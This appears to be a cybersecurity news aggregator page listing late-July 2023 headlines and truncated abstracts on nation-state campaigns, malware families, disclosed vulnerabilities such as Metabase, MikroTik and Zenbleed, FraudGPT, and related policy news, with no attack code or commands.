An ongoing cyber attack campaign has set its sights on Korean-speaking individuals by employing U.S. Military-themed document lures to trick them into running malware on compromised systems. Cybersecurity firm Securonix is tracking the activity under the name STARK#MULE . "Based on the source and likely targets, these types of attacks are on par with past attacks stemming from typical North Korean groups such as APT37 as South Korea has historically been a primary target of the group, especially its government officials," security researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said in a report shared with The Hacker News. APT37, also known by the names Nickel Foxcroft, Reaper, Ricochet Chollima, and ScarCruft, is a North Korean nation-state actor that's known to exclusively focus on targets in its southern counterpart, specifically those involved in reporting on North Korea and supporting defectors. Attack chains mounted by the group have historically reliThe Hacker News
July 28, 2023 – Cryptocurrency
CoinsPaid blames North Korea-linked APT Lazarus for theft of $37M worth of cryptocurrency Full Text
Abstract
Crypto-payments service provider CoinsPaid suffered a cyber attack that resulted in the theft of $37,200,000 worth of cryptocurrency. CoinsPaid, a crypto-payment service provider, fell victim to a cyber attack, leading to the theft of $37,200,000...Security Affairs
July 28, 2023 – Phishing
Nitrogen Malvertising - Sneaky Malware in Search Ads Full Text
Abstract
A recently detected malvertising campaign, known as Nitrogen, has been discovered exploiting Google Search and Bing ads to target users searching for IT tools. The Nitrogen campaign predominantly focuses on technology and non-profit organizations in North America. It operates by posing as inst ... Read MoreCyware
July 28, 2023 – Education
A Data Exfiltration Attack Scenario: The Porsche Experience Full Text
Abstract
As part of Checkmarx's mission to help organizations develop and deploy secure software, the Security Research team started looking at the security posture of major car manufacturers. Porsche has a well-established Vulnerability Reporting Policy (Disclosure Policy) [1] , it was considered in scope for our research, so we decided to start there, and see what we could find. What we found is an attack scenario that results from chaining security issues found on different Porsche's assets, a website and a GraphQL API, that could lead to data exfiltration. Data exfiltration is an attack technique that can impact businesses and organizations, regardless of size. When malicious users breach a company's or organization's systems and exfiltrate data, it can be a jarring and business-critical moment. Porsche has a diverse online presence - deploying several microsites, websites, and web applications. The Porsche Experience [2] is one website that allows registered users toThe Hacker News
July 28, 2023 – Insider Threat
Monitor Insider Threats but Build Trust First Full Text
Abstract
The issue of how to prevent insider threats without infringing on employee privacy is one that has been a hot topic of debate in recent years. Because insider threats are uniquely challenging to detect and identify, different methods are needed than...Security Affairs
July 28, 2023 – Insider Threat
CISA to Establish Network of Regional Election Advisers for 2024 Full Text
Abstract
Announced by Director Jen Easterly on Tuesday, the 10 advisers will support election officials working in their respective areas in an effort to “build even stronger connective tissue between state and local election officials and … CISA.”Cyware
July 28, 2023 – Attack
Hackers Abusing Windows Search Feature to Install Remote Access Trojans Full Text
Abstract
A legitimate Windows search feature is being exploited by malicious actors to download arbitrary payloads from remote servers and compromise targeted systems with remote access trojans such as AsyncRAT and Remcos RAT. The novel attack technique, per Trellix, takes advantage of the " search-ms: " URI protocol handler, which offers the ability for applications and HTML links to launch custom local searches on a device, and the " search: " application protocol, a mechanism for calling the desktop search application on Windows. "Attackers are directing users to websites that exploit the 'search-ms' functionality using JavaScript hosted on the page," security researchers Mathanraj Thangaraju and Sijo Jacob said in a Thursday write-up. "This technique has even been extended to HTML attachments, expanding the attack surface." In such attacks, threat actors have been observed creating deceptive emails that embed hyperlinks or HTML attachmeThe Hacker News
July 28, 2023 – Malware
Related CherryBlos and FakeTrade Android Malware Involved in Scam Campaigns Full Text
Abstract
The CherryBlos malware steals cryptocurrency wallet credentials and replaces withdrawal addresses, while the FakeTrade malware tricks users into downloading apps that promise increased income but prevent fund withdrawals.Cyware
July 28, 2023 – Attack
BlueBravo Deploys GraphicalProton Backdoor Against European Diplomatic Entities Full Text
Abstract
The Russian nation-state actor known as BlueBravo has been observed targeting diplomatic entities throughout Eastern Europe with the goal of delivering a new backdoor called GraphicalProton, exemplifying the continuous evolution of the threat. The phishing campaign is characterized by the use of legitimate internet services (LIS) for command-and-control (C2) obfuscation, Recorded Future said in a new report published Thursday. The activity was observed between March and May 2023. BlueBravo , also known by the names APT29, Cloaked Ursa, and Midnight Blizzard (formerly Nobelium), is attributed to Russia's Foreign Intelligence Service (SVR), and has in the past used Dropbox, Firebase, Google Drive, Notion, and Trello to evade detection and stealthily establish communications with infected hosts. To that end, GraphicalProton is the latest addition to a long list of malware targeting diplomatic organizations after GraphicalNeutrino (aka SNOWYAMBER), HALFRIG, and QUARTERRIG .The Hacker News
July 28, 2023 – Vulnerabilities
Major Security Flaw Discovered in Metabase BI Software – Urgent Update Required Full Text
Abstract
Users of Metabase, a popular business intelligence and data visualization software package, are being advised to update to the latest version following the discovery of an "extremely severe" flaw that could result in pre-authenticated remote code execution on affected installations. Tracked as CVE-2023-38646 , the issue impacts open-source editions prior to 0.46.6.1 and Metabase Enterprise versions before 1.46.6.1. "An unauthenticated attacker can run arbitrary commands with the same privileges as the Metabase server on the server you are running Metabase on," Metabase said in an advisory released last week. The issue has also been addressed in the following older versions - 0.45.4.1 and 1.45.4.1 0.44.7.1 and 1.44.7.1, and 0.43.7.2 and 1.43.7.2 While there is no evidence that the issue has been exploited in the wild, data gathered by the Shadowserver Foundation shows that 5,488 out of the total 6,936 Metabase instances are vulnerable as of July 26, 202The Hacker News
July 28, 2023 – Government
Cybersecurity Agencies Warn Against IDOR Bugs Exploited for Data Breaches Full Text
Abstract
Cybersecurity agencies in Australia and the U.S. have published a joint cybersecurity advisory warning against security flaws in web applications that could be exploited by malicious actors to orchestrate data breach incidents and steal confidential data. This includes a specific class of bugs called Insecure Direct Object Reference ( IDOR ), a type of access control flaw that occurs when an application utilizes user-supplied input or an identifier for direct access to an internal resource, such as a database record, without any additional validations. A typical example of an IDOR flaw is the ability of a user to trivially change the URL (e.g., https://example[.]site/details.php?id= 12345 ) to obtain unauthorized data of another transaction (i.e., https://example[.]site/details.php?id= 67890 ). "IDOR vulnerabilities are access control vulnerabilities enabling malicious actors to modify or delete data or access sensitive data by issuing requests to a website or a web appliThe Hacker News
July 27, 2023 – Policy and Law
GROUP-IB Co-Founder ILYA SACHKOV SENTENCED TO 14 YEARS IN A STRICT PRISON COLONY Full Text
Abstract
Ilya Sachkov, former CEO and co-founder of Group-IB was sentenced to 14 years in a high security prison colony according to the Moscow court announcement. As per the announcement from the Moscow court, Ilya Sachkov, the former CEO and co-founder of Group-IB,...Security Affairs
July 27, 2023 – Government
CISA Analysis Shows Most Cyberattacks on Governments, Critical Infrastructure Involve Valid Credentials Full Text
Abstract
More than half of all cyberattacks on government agencies, critical infrastructure organizations, and state-level government bodies involved the use of valid accounts, according to a new report from the CISA.Cyware
July 27, 2023 – Vulnerabilities
GameOver(lay): Two Severe Linux Vulnerabilities Impact 40% of Ubuntu Users Full Text
Abstract
Cybersecurity researchers have disclosed two high-severity security flaws in the Ubuntu kernel that could pave the way for local privilege escalation attacks. Cloud security firm Wiz, in a report shared with The Hacker News, said the easy-to-exploit shortcomings have the potential to impact 40% of Ubuntu users. "The impacted Ubuntu versions are prevalent in the cloud as they serve as the default operating systems for multiple [cloud service providers]," security researchers Sagi Tzadik and Shir Tamari said. The vulnerabilities – tracked as CVE-2023-32629 and 2023-2640 (CVSS scores: 7.8) and dubbed GameOver(lay) – are present in a module called OverlayFS and arise as a result of inadequate permissions checks in certain scenarios, enabling a local attacker to gain elevated privileges. Overlay Filesystem refers to a union mount file system that makes it possible to combine multiple directory trees or file systems into a single, unified filesystem. A brief descripThe Hacker News
July 27, 2023 – Vulnerabilities
Zimbra fixed actively exploited zero-day CVE-2023-38750 in ZCS Full Text
Abstract
Zimbra addressed a zero-day vulnerability exploited in attacks aimed at Zimbra Collaboration Suite (ZCS) email servers. Two weeks ago Zimbra urged customers to manually install updates to fix a zero-day vulnerability, now tracked as CVE-2023-38750,...Security Affairs
July 27, 2023 – Outage
CardioComm Takes Systems Offline Following Cyberattack Full Text
Abstract
The attack, the company says, impacted its production server environments and has an impact on its business operations. Visitors to the company’s website are informed that CardioComm services are currently offline.Cyware
July 27, 2023 – Phishing
New Malvertising Campaign Distributing Trojanized IT Tools via Google and Bing Search Ads Full Text
Abstract
A new malvertising campaign has been observed leveraging ads on Google Search and Bing to target users seeking IT tools like AnyDesk, Cisco AnyConnect VPN, and WinSCP, and trick them into downloading trojanized installers with an aim to breach enterprise networks and likely carry out future ransomware attacks. Dubbed Nitrogen , the "opportunistic" activity is designed to deploy second-stage attack tools such as Cobalt Strike, Sophos said in a Wednesday analysis. Nitrogen was first documented by eSentire in June 2023, detailing an infection chain that redirects users to compromised WordPress sites hosting malicious ISO image files that ultimately culminate in the delivery of Python scripts and Cobalt Strike Beacons onto the targeted system. Then earlier this month, Trend Micro uncovered a similar attack sequence in which a fraudulent WinSCP application functioned as a stepping stone for a BlackCat ransomware attack. "Throughout the infection chain, the threatThe Hacker News
July 27, 2023 – Breach
DepositFiles exposed config file, jeopardizing user security Full Text
Abstract
DepositFiles, a popular web hosting service, left its environment configuration file accessible, revealing a trove of highly sensitive credentials. The recent tsunami of Cl0p-driven ransomware attacks via the MOVEit Transfer exploit is a painful...Security Affairs
July 27, 2023 – Breach
Up to 11 Million People Hit by MOVEit Hack at Government Services Firm Maximus Full Text
Abstract
According to Maximus, the attackers stole files containing personal information and protected health information, including Social Security numbers, “of at least 8 to 11 million individuals”.Cyware
July 27, 2023 – Education
The 4 Keys to Building Cloud Security Programs That Can Actually Shift Left Full Text
Abstract
As cloud applications are built, tested and updated, they wind their way through an ever-complex series of different tools and teams. Across hundreds or even thousands of technologies that make up the patchwork quilt of development and cloud environments, security processes are all too often applied in only the final phases of software development. Placing security at the very end of the production pipeline puts both devs and security on the back foot. Developers want to build and ship secure apps; security teams want to support this process by strengthening application security. However, today's security processes are legacy approaches that once worked brilliantly for the tight constraints of on-prem production, but struggle in quasi-public, ever-shifting cloud environments. As a result, security is an afterthought, and any attempt to squeeze siloed security into agile SDLC can swell the cost of patching by 600% . A new cloud security operating model is long overdue. Shift-leThe Hacker News
July 27, 2023 – Policy and Law
Group-IB CEO Ilya Sachkov sentenced to 14 years in a strict prison colony Full Text
Abstract
Ilya Sachkov, CEO and co-founder of Group-IB was sentenced to 14 years in a high security prison colony according to the Moscow court announcement. As per the announcement from the Moscow court, Ilya Sachkov, the CEO and co-founder of Group-IB, has been...Security Affairs
July 27, 2023 – Criminals
China Allegedly Turns to Transnational Criminals to Spread Disinformation in Australia Full Text
Abstract
Australian researchers have found evidence that China is using fake social media accounts linked to transnational criminal groups to spread online propaganda and disinformation.Cyware
July 27, 2023 – Attack
Hackers Target Apache Tomcat Servers for Mirai Botnet and Crypto Mining Full Text
Abstract
Misconfigured and poorly secured Apache Tomcat servers are being targeted as part of a new campaign designed to deliver the Mirai botnet malware and cryptocurrency miners. The findings come courtesy of Aqua, which detected more than 800 attacks against its Tomcat server honeypots over a two-year time period, with 96% of the attacks linked to the Mirai botnet. Of these attack attempts, 20% (or 152) entailed the use of a web shell script dubbed "neww" that originated from 24 unique IP addresses, with 68% of them originating from a single IP address (104.248.157[.]218). "The threat actor scanned for Tomcat servers and launched a brute force attack against it, attempting to gain access to the Tomcat web application manager by trying different combinations of credentials associated with it," Aqua security researcher Nitzan Yaakov said . Upon gaining a successful foothold, the threat actors have been observed deploying a WAR file that contains a malicious web sThe Hacker News
July 27, 2023 – General
Two flaws in Linux Ubuntu affect 40% of Ubuntu users Full Text
Abstract
Wiz researchers discovered two Linux vulnerabilities in the Ubuntu kernel that can allow an unprivileged local user to gain elevated privileges. Wiz Research discovered two privilege escalation vulnerabilities, tracked as CVE-2023-2640 and CVE-2023-32629,...Security Affairs
July 27, 2023 – Malware
Introducing FraudGPT: The Latest AI Cybercrime Tool in the Dark Web Full Text
Abstract
In the wake of WormGPT's success, threat actors have now introduced another AI-powered cybercrime tool called FraudGPT . This AI bot is being promoted on numerous dark web marketplaces and Telegram channels, and is capable of designing spear-phishing emails, generating cracking tools, and facilit ... Read MoreCyware
July 27, 2023 – Policy and Law
Group-IB Co-Founder Sentenced to 14 Years in Russian Prison for Alleged High Treason Full Text
Abstract
A city court in Moscow on Wednesday convicted Group-IB co-founder and CEO Ilya Sachkov of "high treason" and jailed him for 14 years in a "strict regime colony" over accusations of passing information to foreign spies. "The court found Sachkov guilty under Article 275 of the Russian Criminal Code (high treason) sentencing him to 14 years of incarceration in a maximum-security jail, restriction of freedom for one year and a fine of 500,000 rubles (about $5,550)," state news agency TASS reported . Sachkov, who has been in custody since September 2021 and denied wrongdoing, had been accused of handing over classified information to foreign intelligence in 2011, which the prosecutors said caused reputational damage to Russia's national interests. The exact nature of the charges is unclear. The 37-year-old is expected to appeal the decision, Bloomberg said , adding, "Sachkov was alleged to have given the U.S. government information regardinThe Hacker News
July 27, 2023 – Malware
Decoy Dog Malware Evolves to Expand its Reach Full Text
Abstract
An unidentified nation-state appears to be preparing for a new hacking campaign, according to researchers at Infoblox. The campaign uses the relatively new Decoy Dog malware toolkit. Decoy Dog has undergone a major upgrade from Pupy , an open-source remote access tool, to disguise its activities ... Read MoreCyware
July 27, 2023 – Policy and Law
New SEC Rules Require U.S. Companies to Reveal Cyber Attacks Within 4 Days Full Text
Abstract
The U.S. Securities and Exchange Commission (SEC) on Wednesday approved new rules that require publicly traded companies to publicize details of a cyber attack within four days of identifying that it has a "material" impact on their finances, marking a major shift in how computer breaches are disclosed. "Whether a company loses a factory in a fire — or millions of files in a cybersecurity incident — it may be material to investors," SEC chair Gary Gensler said . "Currently, many public companies provide cybersecurity disclosure to investors. I think companies and investors alike, however, would benefit if this disclosure were made in a more consistent, comparable, and decision-useful way." To that end, the new obligations mandate that companies reveal the incident's nature, scope, and timing, as well as its impact. This disclosure, however, may be delayed by an additional period of up to 60 days should it be determined that giving out such specificThe Hacker News
July 27, 2023 – Government
DOJ Reorganizes Units to Better Fight Ransomware Full Text
Abstract
The U.S. Justice Department is merging its National Cryptocurrency Enforcement Team with its Crime and Intellectual Property Section to strengthen its capabilities in investigating cryptocurrency-related criminal cases and cybercrime.Cyware
July 26, 2023 – Business
Protect AI Raises $35M to Build a Suite of AI-Defending Tools Full Text
Abstract
Protect AI announced that it raised $35 million in a Series A round led by Evolution Equity Partners with participation from Salesforce Ventures, Acrew Capital, boldstart ventures, Knollwood Capital and Pelion Ventures.Cyware
July 26, 2023 – Malware
Decoy Dog: New Breed of Malware Posing Serious Threats to Enterprise Networks Full Text
Abstract
A deeper analysis of a recently discovered malware called Decoy Dog has revealed that it's a significant upgrade over the Pupy RAT , an open-source remote access trojan it's modeled on. "Decoy Dog has a full suite of powerful, previously unknown capabilities – including the ability to move victims to another controller, allowing them to maintain communication with compromised machines and remain hidden for long periods of time," Infoblox said in a Tuesday report. "Some victims have actively communicated with a Decoy Dog server for over a year." Other new features allow the malware to execute arbitrary Java code on the client and connect to emergency controllers using a mechanism that's similar to a traditional DNS domain generation algorithm ( DGA ), with the Decoy Dog domains engineered to respond to replayed DNS queries from breached clients. The sophisticated toolkit was first discovered by the cybersecurity firm in early April 2023 afterThe Hacker News
July 26, 2023 – Outage
Two ambulance services in UK lost access to patient records after a cyber attack on software provider Full Text
Abstract
Swedish software firm Ortivus suffered a cyberattack that has resulted in at least two British ambulance services losing access to electronic patient records. Two British ambulance services were not able to access electronic patient records after...Security Affairs
July 26, 2023 – Outage
UK Ambulance Services Disrupted by Infosec Fiends Full Text
Abstract
Several UK NHS ambulance organizations have been struggling to record patient data and pass it to other providers following a cyberattack aimed at health software company Ortivus.Cyware
July 26, 2023 – General
The Alarming Rise of Infostealers: How to Detect this Silent Threat Full Text
Abstract
A new study conducted by Uptycs has uncovered a stark increase in the distribution of information stealing (a.k.a. infostealer or stealer) malware. Incidents have more than doubled in Q1 2023, indicating an alarming trend that threatens global organizations. According to the new Uptycs' whitepaper, Stealers are Organization Killers , a variety of new info stealers have emerged this year, preying on Windows, Linux, and macOS systems. Telegram has notably been used extensively by these malware authors for command, control, and data exfiltration. What is a Stealer? A stealer is a type of malware that targets its victim by stealing sensitive information that can include passwords, login credentials, and other personal data. After collecting such data, the stealer sends it to the threat actor's command and control (C2) system. RedLine and Vidar, two well-known stealers, took advantage of log-providing services to infiltrate private systems. RedLine primarily targets credentiThe Hacker News
July 26, 2023 – Malware
FraudGPT, a new malicious generative AI tool appears in the threat landscape Full Text
Abstract
FraudGPT is another cybercrime generative artificial intelligence (AI) tool that is advertised in the hacking underground. Generative AI models are becoming attractive for crooks, Netenrich researchers recently spotted a new platform dubbed FraudGPT...Security Affairs
July 26, 2023 – Government
To Execute the National Cyber Strategy, It’s Going to Take the Whole US Government Full Text
Abstract
The implementation plan for the national cybersecurity strategy assigns specific tasks and responsibilities to various government agencies, highlighting the need for coordination and collaboration.Cyware
July 26, 2023 – Criminals
Fenix Cybercrime Group Poses as Tax Authorities to Target Latin American Users Full Text
Abstract
Tax-paying individuals in Mexico and Chile have been targeted by a Mexico-based cybercrime group that goes by the name Fenix to breach targeted networks and steal valuable data. A key hallmark of the operation entails cloning official portals of the Servicio de Administración Tributaria (SAT) in Mexico and the Servicio de Impuestos Internos (SII) in Chile and redirecting potential victims to those sites. "These fake websites prompt users to download a supposed security tool, claiming it will enhance their portal navigation safety," Metabase Q security researchers Gerardo Corona and Julio Vidal said in a recent analysis. "However, unbeknownst to the victims, this download actually installs the initial stage of malware, ultimately enabling the theft of sensitive information such as credentials." The goal of Fenix, according to the Latin America-focused cybersecurity firm, is to act as an initial access broker and get a foothold into different companies in tThe Hacker News
July 26, 2023 – Government
CISA adds Ivanti EPMM flaw to its Known Exploited Vulnerabilities catalog Full Text
Abstract
US CISA added actively exploited Ivanti 's Endpoint Manager Mobile (EPMM) vulnerability to its Known Exploited Vulnerabilities catalog. US Cybersecurity and Infrastructure Security Agency (CISA) added actively exploited Ivanti 's Endpoint Manager...Security Affairs
July 26, 2023 – Criminals
FraudGPT: The Villain Avatar of ChatGPT Full Text
Abstract
Cybercriminals are using artificial intelligence tools like FraudGPT to create sophisticated phishing attacks and other malicious activities, posing a significant threat to organizations.Cyware
July 26, 2023 – Malware
New AI Tool ‘FraudGPT’ Emerges, Tailored for Sophisticated Attacks Full Text
Abstract
Following the footsteps of WormGPT , threat actors are advertising yet another cybercrime generative artificial intelligence (AI) tool dubbed FraudGPT on various dark web marketplaces and Telegram channels. "This is an AI bot, exclusively targeted for offensive purposes, such as crafting spear phishing emails, creating cracking tools, carding, etc.," Netenrich security researcher Rakesh Krishnan said in a report published Tuesday. The cybersecurity firm said the offering has been circulating since at least July 22, 2023, for a subscription cost of $200 a month (or $1,000 for six months and $1,700 for a year). "If your [sic] looking for a Chat GPT alternative designed to provide a wide range of exclusive tools, features, and capabilities tailored to anyone's individuals with no boundaries then look no further!," claims the actor, who goes by the online alias CanadianKingpin. The author also states that the tool could be used to write malicious code, cThe Hacker News
July 26, 2023 – Vulnerabilities
Over 500K MikroTik RouterOS systems potentially exposed to hacking due to critical flaw Full Text
Abstract
Experts warn of a severe privilege escalation, tracked as CVE-2023-30799, in MikroTik RouterOS that can be exploited to hack vulnerable devices. VulnCheck researchers warn of a critical vulnerability, tracked as CVE-2023-30799 (CVSS score:...Security Affairs
July 26, 2023 – Policy and Law
Federal Privacy Bill Would Strip FCC’s Role as Telecom Industry’s Privacy Cop Full Text
Abstract
Sweeping federal privacy legislation now under debate in Congress is expected to move oversight of the telecom industry’s privacy practices from the FCC to the FTC, a shift that has long been a priority for telecom companies.Cyware
July 26, 2023 – Malware
Rust-based Realst Infostealer Targeting Apple macOS Users’ Cryptocurrency Wallets Full Text
Abstract
A new malware family called Realst has become the latest to target Apple macOS systems, with a third of the samples already designed to infect macOS 14 Sonoma, the upcoming major release of the operating system. Written in the Rust programming language, the malware is distributed in the form of bogus blockchain games and is capable of "emptying crypto wallets and stealing stored password and browser data" from both Windows and macOS machines. Realst was first discovered in the wild by security researcher iamdeadlyz . "Realst Infostealer is distributed via malicious websites advertising fake blockchain games with names such as Brawl Earth, WildWorld, Dawnland, Destruction, Evolion, Pearl, Olymp of Reptiles, and SaintLegend," SentinelOne security researcher Phil Stokes said in a report. "Each version of the fake blockchain game is hosted on its own website complete with associated Twitter and Discord accounts." The cybersecurity firm, which identifThe Hacker News
July 26, 2023 – General
Supply Chain, Open Source Pose Major Challenge to AI Systems Full Text
Abstract
Supply chain compromise, open source technology, and rapid advances in artificial intelligence capabilities pose significant challenges to safeguarding AI, experts told a Senate panel Tuesday.Cyware
July 26, 2023 – Vulnerabilities
Critical MikroTik RouterOS Vulnerability Exposes Over Half a Million Devices to Hacking Full Text
Abstract
A severe privilege escalation issue impacting MikroTik RouterOS could be weaponized by remote malicious actors to execute arbitrary code and seize full control of vulnerable devices. Cataloged as CVE-2023-30799 (CVSS score: 9.1), the shortcoming is expected to put approximately 500,000 and 900,000 RouterOS systems at risk of exploitation via their web and/or Winbox interfaces, respectively, VulnCheck disclosed in a Tuesday report. "CVE-2023-30799 does require authentication," security researcher Jacob Baines said . "In fact, the vulnerability itself is a simple privilege escalation from admin to 'super-admin' which results in access to an arbitrary function. Acquiring credentials to RouterOS systems is easier than one might expect." This is because the Mikrotik RouterOS operating system does not offer any protection against password brute-force attacks and ships with a well-known default "admin" user, with its password being an empty stringThe Hacker News
July 26, 2023 – Malware
New Realst Info-stealer Targets MacOS, Empties Crypto Wallets Full Text
Abstract
In the ever-evolving information-stealer landscape, a new malware dubbed Realst has emerged. Realst is designed to target macOS systems and is capable of emptying crypto wallets and stealing stored passwords and browser data. A ttackers are using tricks to lure gamers with money, which is a red ... Read MoreCyware
July 25, 2023 – Malware
Spyhide Stalkerware is Spying on Tens of Thousands of Phones Full Text
Abstract
Spyhide is secretly collecting private data from tens of thousands of Android devices worldwide. The app is often installed on a victim's phone by someone who knows their passcode, and it remains hidden on the home screen.Cyware
July 25, 2023
North Korean Nation-State Actors Exposed in JumpCloud Hack After OPSEC Blunder Full Text
Abstract
North Korean nation-state actors affiliated with the Reconnaissance General Bureau (RGB) have been attributed to the JumpCloud hack following an operational security (OPSEC) blunder that exposed their actual IP address. Google-owned threat intelligence firm Mandiant attributed the activity to a threat actor it tracks under the name UNC4899, which likely shares overlaps with clusters already being monitored as Jade Sleet and TraderTraitor, a group with a history of striking blockchain and cryptocurrency sectors. UNC4899 also overlaps with APT43 , another hacking crew associated with the Democratic People's Republic of Korea (DPRK) that was unmasked earlier this March as conducting a series of campaigns to gather intelligence and siphon cryptocurrency from targeted companies. The adversarial collective's modus operandi is characterized by the use of Operational Relay Boxes ( ORBs ) using L2TP IPsec tunnels along with commercial VPN providers to disguise the attacker'sThe Hacker News
July 25, 2023 – Vulnerabilities
Atlassian addressed 3 flaws in Confluence and Bamboo products Full Text
Abstract
Atlassian addressed three vulnerabilities in its Confluence Server, Data Center, and Bamboo Data Center products that can lead to remote code execution. Atlassian has addressed three critical and high severity vulnerabilities impacting...Security Affairs
July 25, 2023 – Business
Thales Acquiring Imperva From Thoma Bravo for $3.6 Billion Full Text
Abstract
Thales will buy Imperva for an enterprise value of $3.6 billion ($3.7 billion gross value minus $0.1 billion tax benefits). The transaction is expected to close by the beginning of 2024.Cyware
July 25, 2023 – Malware
Casbaneiro Banking Malware Goes Under the Radar with UAC Bypass Technique Full Text
Abstract
The financially motivated threat actors behind the Casbaneiro banking malware family have been observed making use of a User Account Control ( UAC ) bypass technique to gain full administrative privileges on a machine, a sign that the threat actor is evolving their tactics to avoid detection and execute malicious code on compromised assets. "They are still heavily focused on Latin American financial institutions, but the changes in their techniques represent a significant risk to multi-regional financial organizations as well," Sygnia said in a statement shared with The Hacker News. Casbaneiro , also known as Metamorfo and Ponteiro, is best known for its banking trojan, which first emerged in mass email spam campaigns targeting the Latin American financial sector in 2018. Infection chains typically begin with a phishing email pointing to a booby-trapped attachment that, when launched, activates a series of steps that culminate in the deployment of the banking malwareThe Hacker News
July 25, 2023 – Vulnerabilities
VMware addressed an information disclosure flaw in VMware Tanzu Application Service for VMs and Isolation Segment Full Text
Abstract
VMware fixed an information disclosure flaw in VMware Tanzu Application Service for VMs and Isolation Segment that exposed CF API admin credentials in audit logs. VMware has addressed an information disclosure vulnerability, tracked as CVE-2023-20891...Security Affairs
July 25, 2023
Chinese Cyberespionage Group APT31 Targets Eastern European Entities Full Text
Abstract
A China-linked group APT31 (aka Zirconium) has been linked to a cyberespionage campaign targeting industrial organizations in Eastern Europe. The attackers abused DLL hijacking vulnerabilities in cloud-based data storage systems such as Dropbox or Yandex, as well as a temporary file-sharing serv ... Read MoreCyware
July 25, 2023 – General
macOS Under Attack: Examining the Growing Threat and User Perspectives Full Text
Abstract
As the number of people using macOS keeps going up, so does the desire of hackers to take advantage of flaws in Apple's operating system. What Are the Rising Threats to macOS? There is a common misconception among macOS fans that Apple devices are immune to hacking and malware infection. However, users have been facing more and more dangers recently. Inventive attackers are specifically targeting Mac systems, as seen with the "Geacon" Cobalt Strike tool attack. This tool enables them to perform malicious actions such as data theft, privilege elevation, and remote device control, placing the security and privacy of Mac users at grave risk. Earlier this year, researchers also uncovered the MacStealer malware, which also stole sensitive data from Apple users. Documents, iCloud keychain data, browser cookies, credit card credentials – nothing is safe from the prying eyes. But that's not all. CloudMensis is malicious software that specifically targets macOS systems,The Hacker News
July 25, 2023 – Vulnerabilities
Apple addressed a new actively exploited zero-day tracked as CVE-2023-38606 Full Text
Abstract
Apple released security updates to address an actively exploited zero-day flaw in iOS, iPadOS, macOS, tvOS, watchOS, and Safari. Apple released urgent security updates to address multiple flaws in iOS, iPadOS, macOS, tvOS, watchOS, and Safari, including...Security Affairs
July 25, 2023 – General
RaaS proliferation: 14 new ransomware groups target organizations worldwide Full Text
Abstract
In the second quarter of 2023, GuidePoint Research and Intelligence Team (GRIT) tracked 1,177 total publicly posted ransomware victims claimed by 41 different threat groups.Cyware
July 25, 2023 – Vulnerabilities
TETRA:BURST — 5 New Vulnerabilities Exposed in Widely Used Radio Communication System Full Text
Abstract
A set of five security vulnerabilities have been disclosed in the Terrestrial Trunked Radio ( TETRA ) standard for radio communication used widely by government entities and critical infrastructure sectors, including what's believed to be an intentional backdoor that could have potentially exposed sensitive information. The issues, discovered by Midnight Blue in 2021 and held back until now, have been collectively called TETRA:BURST . There is no conclusive evidence to determine that the vulnerabilities have been exploited in the wild to date. "Depending on infrastructure and device configurations, these vulnerabilities allow for real time decryption, harvest-now-decrypt-later attacks, message injection, user deanonymization, or session key pinning," the Netherlands-based cybersecurity company said . Standardized by the European Telecommunications Standards Institute (ETSI) in 1995, TETRA is used in more than 100 countries and as a police radio communication systemThe Hacker News
July 25, 2023 – Attack
Twelve Norwegian ministries were hacked using a zero-day vulnerability Full Text
Abstract
Threat actors exploited a zero-day flaw in third-party software in attacks against the ICT platform used by 12 Norwegian ministries. The ICT platform used by twelve ministries of the Norwegian government was hacked, and threat actors have exploited...Security Affairs
July 25, 2023 – Education
How MDR Helps Solve the Cybersecurity Talent Gap Full Text
Abstract
How do you overcome today's talent gap in cybersecurity? This is a crucial issue — particularly when you find executive leadership or the board asking pointed questions about your security team's ability to defend the organization against new and current threats. This is why many security leaders find themselves turning to managed security services like MDR ( managed detection and response ), which can offer an immediate solution. The right MDR partner can act as an extension of your existing team, while offering a fast and budget-friendly option for uplevelling security at organizations of virtually any size. Here's a look at common staffing challenges that MDR helps solve: Overcoming Cybersecurity Talent Challenges From stopping ransomware to securing the attack surface of the environment, most security teams have more to do than they can manage. This leads to security gaps that increase both cyber risk and frustration for stakeholders across the business. The challThe Hacker News
July 25, 2023 – Vulnerabilities
Zenbleed: New Flaw in AMD Zen 2 Processors Puts Encryption Keys and Passwords at Risk Full Text
Abstract
A new security vulnerability has been discovered in AMD's Zen 2 architecture-based processors that could be exploited to extract sensitive data such as encryption keys and passwords. Discovered by Google Project Zero researcher Tavis Ormandy, the flaw – codenamed Zenbleed and tracked as CVE-2023-20593 (CVSS score: 6.5) – allows data exfiltration at the rate of 30 kb per core, per second. The issue is part of a broader category of weaknesses called speculative execution attacks , in which the optimization technique widely used in modern CPUs is abused to access cryptographic keys from CPU registers. "Under specific microarchitectural circumstances, a register in 'Zen 2' CPUs may not be written to 0 correctly," AMD explained in an advisory. "This may cause data from another process and/or thread to be stored in the YMM register , which may allow an attacker to potentially access sensitive information." Web infrastructure company Cloudflare noteThe Hacker News
July 25, 2023 – Vulnerabilities
Atlassian Releases Patches for Critical Flaws in Confluence and Bamboo Full Text
Abstract
Atlassian has released updates to address three security flaws impacting its Confluence Server, Data Center, and Bamboo Data Center products that, if successfully exploited, could result in remote code execution on susceptible systems. The list of the flaws is below - CVE-2023-22505 (CVSS score: 8.0) - RCE (Remote Code Execution) in Confluence Data Center and Server (Fixed in versions 8.3.2 and 8.4.0) CVE-2023-22508 (CVSS score: 8.5) - RCE (Remote Code Execution) in Confluence Data Center and Server (Fixed in versions 7.19.8 and 8.2.0) CVE-2023-22506 (CVSS score: 7.5) - Injection, RCE (Remote Code Execution) in Bamboo (Fixed in versions 9.2.3 and 9.3.1) CVE-2023-22505 and CVE-2023-22508 allow an "authenticated attacker to execute arbitrary code which has high impact to confidentiality, high impact to integrity, high impact to availability, and no user interaction," the company said. While the first bug was introduced in version 8.0.0, CVE-2023-22508 was introducThe Hacker News
July 25, 2023 – Vulnerabilities
Ivanti Releases Urgent Patch for EPMM Zero-Day Vulnerability Under Active Exploitation Full Text
Abstract
